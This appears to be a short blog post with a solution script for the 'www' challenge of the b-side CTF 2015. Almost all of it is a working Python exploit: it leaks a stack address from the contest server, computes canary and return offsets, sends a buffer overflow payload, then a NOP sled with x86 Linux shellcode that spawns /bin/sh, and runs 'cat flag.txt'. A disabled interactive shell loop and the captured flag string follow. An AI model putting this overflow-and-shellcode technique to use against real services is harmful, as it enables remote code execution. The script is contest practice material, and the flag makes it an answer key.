ETC b-side ctf 2015 - www LF0827 2015. 3. 18. 06:19 from lsm import * host = "www.termsec.net" port = 17284 shellcode = ("\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80") s = Connect(host, port) reading = s.recv(264) first_addr='' for i in range(87, (87+10)): first_addr += reading[i] print "first_addr : "+str(first_addr) canary_loc = int(first_addr, 16)-0x131 ret_loc = int(first_addr, 16)-0xe4 payload1 = '' payload1 += "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJKKKL" # dummy payload1 += p(ret_loc) #jmp to NOP payload1 += p(canary_loc) # canary location in stack payload1 += p(0x08049d68) # randval using canary in code s.send(payload1+'\n') sleep(2) payload2 = '' payload2 += "\x90"*130 payload2 += shellcode s.send(payload2+'\n') print s.recv(100) print s.recv(100) print s.recv(1024) sleep(1) s.send("cat flag.txt\n") print s.recv(100) """ while 1: tmp = raw_input("$ ") if len(tmp): s.send(tmp+"\n") else: continue print s.recv(4096) """ #flag{K33P_ST4T1C_L1K3_W00L_F4BR1C} www-6c895cf622477d1bd2969ddbdf7c64185db9a41e www-6c895cf622477d1bd2969ddbdf7c64185db9a41e.idb
www-6c895cf622477d1bd2969ddbdf7c64185db9a41e